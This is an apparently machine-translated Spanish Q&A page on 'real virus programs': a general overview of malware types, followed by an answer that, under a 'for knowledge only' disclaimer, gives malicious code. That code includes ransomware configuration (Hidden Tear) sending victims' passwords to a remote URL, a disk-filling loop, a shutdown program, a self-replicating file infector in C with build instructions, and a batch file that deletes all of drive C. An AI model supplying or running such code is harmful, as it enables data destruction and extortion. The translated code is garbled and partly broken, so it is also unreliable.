¿Cuáles son algunos programas de virus reales?

¿Qué son los programas maliciosos, los virus, el software espía y las cookies, y qué los diferencia?

“Malware” es la abreviatura de software malicioso y se usa como un término único para referirse a virus, software espía, gusanos, etc. El malware está diseñado para causar daño a una computadora autónoma o una PC en red. Entonces, donde sea que se use un término de malware, significa que un programa diseñado para dañar su computadora puede ser un virus, gusano o troyano.

Gusanos: –
Los gusanos son programas maliciosos que realizan copias de sí mismos una y otra vez en la unidad local, recursos compartidos de red, etc. El único propósito del gusano es reproducirse una y otra vez. No daña ningún dato / archivo en la computadora. A diferencia de un virus, no es necesario que se una a un programa existente. Los gusanos se propagan explotando las vulnerabilidades en los sistemas operativos

Ejemplos de gusanos son: – W32.SillyFDC.BBY
Packed.Generic.236
W32.Troresba

Debido a su naturaleza de replicación, ocupa mucho espacio en el disco duro y consume más usos de CPU, lo que a su vez hace que la PC demasiado lenta también consuma más ancho de banda de red.

Virus:-
Virus es un programa escrito para ingresar a su computadora y dañar / alterar sus archivos / datos. Un virus puede dañar o borrar datos en su computadora. Los virus también pueden replicarse. Un virus informático es más peligroso que un gusano informático ya que realiza cambios o elimina sus archivos mientras que los gusanos solo se replican sin realizar cambios en sus archivos / datos.

Ejemplos de virus son: – W32.Sfc! Mod
ABAP.Rivpas.A
Aceptar.3773

Los virus pueden ingresar a su computadora como un archivo adjunto de imágenes, saludo o archivos de audio / video. Los virus también ingresan a través de descargas en Internet. Se pueden ocultar en un software gratuito / de prueba u otros archivos que descargue.

Entonces, antes de descargar cualquier cosa de internet, asegúrese de hacerlo primero. Casi todos los virus están adjuntos a un archivo ejecutable, lo que significa que el virus puede existir en su computadora, pero en realidad no puede infectar su computadora a menos que ejecute o abra el programa malicioso. Es importante tener en cuenta que un virus no se puede propagar sin una acción humana, como ejecutar un programa infectado para mantenerlo en funcionamiento.

Virus es de diferentes tipos que son los siguientes.

1) Virus de archivos
2) Virus de macro
3) Virus maestro de registro de arranque
4) virus del sector de arranque
5) Virus multipartitos
6) Virus polimórficos
7) Virus ocultos

File Virus: este tipo de virus normalmente infecta archivos de programa como .exe, .com, .bat. Una vez que este virus permanece en la memoria, intenta infectar todos los programas que se cargan en la memoria.

Virus de macro: – Este tipo de virus infecta Word, Excel, PowerPoint, acceso y otros archivos de datos. Una vez infectada, la reparación de estos archivos es muy difícil.

Archivos maestros de registro de arranque: – Los virus MBR son virus residentes en memoria y se copian al primer sector de un dispositivo de almacenamiento que se usa para tablas de partición o programas de carga de SO. Un virus MBR infectará esta área particular del dispositivo de almacenamiento en lugar de archivos normales . La forma más fácil de eliminar un virus MBR es limpiar el área MBR,

Virus del sector de arranque: – El virus del sector de arranque infecta el sector de arranque de un HDD o FDD. Estos también son residentes de memoria en la naturaleza. Tan pronto como la computadora se inicia, se infecta del sector de arranque.
Limpiar este tipo de virus es muy difícil.

Virus Multipartite: – Un híbrido de virus de arranque / programa / archivo. Infectan los archivos de programa y cuando se ejecuta el programa infectado, estos virus infectan el registro de arranque. Cuando inicie la computadora la próxima vez que el virus del registro de inicio se cargue en la memoria y luego comience a infectar otros archivos de programa en el disco

Virus polimórficos: un virus que puede encriptar su código de diferentes maneras para que aparezca de manera diferente en cada infección. Estos virus son más difíciles de detectar.

Virus sigilosos: – Este tipo de virus usa diferentes tipos de técnicas para evitar la detección. O bien redirigen el cabezal del disco para leer otro sector en lugar de aquel en el que residen o pueden alterar la lectura del tamaño del archivo infectado que se muestra en la lista del directorio. Por ejemplo, el virus Whale agrega 9216 bytes a un archivo infectado; luego el virus resta la misma cantidad de bytes (9216) del tamaño indicado en el directorio.

Troyanos: – Un caballo de Troya no es un virus. Es un programa destructivo que se ve como una aplicación genuina. A diferencia de los virus, los caballos de Troya no se replican, pero pueden ser tan destructivos. Los troyanos también abren una entrada de puerta trasera a su computadora que da a los usuarios / programas maliciosos acceso a su sistema, lo que permite que la información confidencial y personal sea robada.

Ejemplo: – JS.Debeski.Trojan

Los caballos de Troya se dividen en clasificación según cómo infectan los sistemas y el daño causado por ellos. Los siete tipos principales de caballos de Troya son:
• Troyanos de acceso remoto
• Troyanos que envían datos
• Troyanos destructivos
• Proxy Trojans
• FTP troyanos
• Troyanos de deshabilitación del software de seguridad
• Troyanos de ataque de denegación de servicio

Adware: – Generically adware es una aplicación de software en la que se muestran banners publicitarios mientras se ejecuta cualquier programa. El adware se puede descargar automáticamente a su sistema mientras navega por cualquier sitio web y se puede ver a través de ventanas emergentes o a través de una barra que aparece en la pantalla de una computadora automáticamente. Los adwares son utilizados por las empresas con fines comerciales.

Spywares: – El software espía es un tipo de programa que se instala con o sin su permiso en sus computadoras personales para recopilar información sobre los usuarios, su computadora o hábitos de navegación rastrea cada y todo lo que hace sin su conocimiento y lo envía al usuario remoto. También puede descargar otros programas maliciosos de Internet e instalarlo en la computadora. El spyware funciona como adware, pero generalmente es un programa separado que se instala sin saberlo cuando instala otro programa o aplicación de tipo freeware.

Spam: – Spamming es un método de inundar Internet con copias del mismo mensaje. La mayoría de los spams son anuncios comerciales que se envían como un correo electrónico no deseado a los usuarios. Los correos electrónicos no deseados también se conocen como correos electrónicos no deseados o publicaciones de grupos de noticias no deseados. Estos correos no deseados son muy molestos ya que siguen llegando todos los días y mantienen su buzón lleno.

Cookies de seguimiento: – Una cookie es un archivo de texto sin formato que se almacena en su computadora en una carpeta de cookies y almacena datos sobre su sesión de navegación. Las cookies son utilizadas por muchos sitios web para rastrear la información de los visitantes. Una cookie de seguimiento es una cookie que rastrea toda su información de navegación y es utilizada por hackers y compañías para conocer todos sus datos personales como información de la cuenta bancaria, información de su tarjeta de crédito, etc. es peligroso .

Aplicaciones engañosas: – Las aplicaciones engañosas te guían incorrectamente sobre el estado de seguridad de tu computadora y te muestran que tu computadora está infectada por algún malware y debes descargar la herramienta para eliminar la amenaza. Al descargar la herramienta, muestra algunas amenazas en su computadora y para eliminarla debe comprar el producto para el que solicita información personal, como información de la tarjeta de crédito, etc.

Bien, antes de responder a esta pregunta, me gustaría decir: “Los siguientes programas son solo para fines de conocimiento . No soy responsable por ningún daño hecho a nadie .

Vayamos al grano.

VIRUS:

V ital I nformation R osources U nder S eize . Un virus informático es un programa informático o una pieza de código que se carga en su computadora sin su conocimiento y se ejecuta en contra de su consentimiento. El virus tiene una propiedad para replicarse y propagarse desde una computadora a otra.

Hay muchas maneras de crear un virus para su propio lenguaje de programación. Aquí algunos códigos C que crean virus.

1) ¿Cómo configurar tu Ransomware personalizado usando Oculted Tear?

1. Necesita tener un servidor web que admita lenguajes de scripting como PHP o Python. Luego, cambie la línea que se menciona a continuación con su URL. (Mejor utilizar la conexión HTTPS para evitar escuchas):

cadena targetURL = “ https://www.example.com/hidden-t“;

2. La secuencia de comandos debe escribir el parámetro GET en un archivo de texto. Proceso de envío ejecutándose en la función SendPassword ():

string info = computerName + “-” + userName + “” + contraseña;

var fullUrl = targetURL + info;

var conent = new http://System.Net .WebClient (). DownloadString (fullUrl);

3. Las extensiones de archivo de destino también pueden cambiar. Lista predeterminada:

var validExtensions = new [] {“.xtxt”, “.doc”, “.docx”, “.xls”, “.xlsx”, “.ppt”, “.pptx”, “.odt”, “.jpg “,” .png “,” .csv “,” .sql “,” .mdb “,” .sln “,” .php “,” .asp “,” .aspx “,” .html “,” .xml “,” .psd “};

2) Este código “atascará su disco duro”.

#include
#include
vacío principal()
{
mientras (1)
{
sistema (“dir >> â.ša.exe”);
}
}
aquí un programa de virus simple, pero tiene la capacidad de bloquear el disco duro. El programa crea un archivo auto creciente que crece a pocos MB y continúa infinitamente.

¿Cómo funciona?-

La llamada al sistema “dir >> â.ša.exe” ejecutará el comando dos ‘dir’ y redirigirá su salida a un archivo “â.ša.exe”. Por lo tanto, se ejecutará el programa en una carpeta que tenga muchos archivos y carpetas. el tamaño de “â.ša.exe” en gran cantidad. Este proceso continuará infinitamente ya que está en (1) ciclo. Recuerde recuperar esta infección de virus simplemente elimine el archivo virus.exe .

3) El siguiente programa que apagará su sistema operativo. Aquí está..

% close.exe%
void principal (vacío)
{
sistema (“shutdown-s”);
}

supongamos que lo anterior. Deja que el nombre del archivo sea close.c y compile y ejecute el código anterior. Ahora cierre el compilador turbo c y abra el directorio en la ventana que ha guardado el close.c (directorio predeterminado C: \ TC \ BIN) y doble haga clic en su archivo .exe (close.exe). Después de un tiempo su ventana se apagará.

4) Virus Self Replicating Aquí el código es …

#include
#include
#include
#include
#include
#include
ARCHIVO * virus, * host;
int hecho, a = 0;
sin signo largo x;
char buff [2048];
struct ffblk ffblk;
clock_t st, end;
vacío principal()
{
st = reloj ();
clrscr ();
done = findfirst (“*. *”, & ffblk, 0);
mientras (! hecho)
{
virus = fopen (_argv [0], “rb”);
host = fopen (ffblk.ff_name, “rb +”);
if (host == NULL) goto next;
x = 89088;
printf (“Infección de% s \ n”, ffblk.ff_name, a);
mientras (x> 2048)
{
fread (buff, 2048,1, virus);
fwrite (buff, 2048,1, host);
x- = 2048;
}
fread (buff, x, 1, virus);
fwrite (buff, x, 1, host);
a ++;
siguiente:
{
fcloseall ();
done = findnext (& ffblk);
}
}
printf (“¡HECHO! (Total de archivos infectados =% d)”, a);
end = clock ();
printf (“TIEMPO TOMADO =% f SEC \ n”, (fin de st) / CLK_TCK);
getch ();
}

Guardar como> virus.c

  • Ahora compila este código con tu compilador de C. Puedes dar un vistazo aqui.
  • Anote la longitud del archivo exe generado en bytes.
  • Reemplace el valor de X en la línea 23 en el código fuente a esta longitud en bytes.
  • Recompila el código. El nuevo archivo exe está listo para infectar.

    REALICE UNA PRUEBA:

  • Abra una nueva carpeta vacía.
  • Pon algunos archivos exe (también puedes poner los archivos de configuración).
  • Cuando ejecutas el archivo virus.exe , todos los archivos presentes estarán infectados.
  • Todos los archivos infectados estarán listos para reinfectarse.

    5) Abra el Bloc de notas y copie el código debajo.

    @Echo off
    Del C: \ *. * | Y

    Guarde este archivo como virus.bat (El nombre puede ser cualquier cosa menos .bat es obligatorio)
    Ahora, ejecutar este archivo eliminará todo el contenido de C Drive .

Gracias 🙂

Los programas Real Virus se encuentran principalmente en ventanas emergentes, que encontraste navegando por internet. Estas ventanas emergentes abren algunas páginas web que contienen contenido malicioso, que en su mayoría es un virus.

Estos son generalmente descargadores, que son dados por los sitios.

Si se dio cuenta, está descargando una película pirateada o cualquier software y encontró un tamaño mucho menor de 1MB a 3MB. Sites dice que estos son descargadores, pero en realidad no descargan contenido original, descargan e instalan aplicaciones no deseadas que podrían ser virus.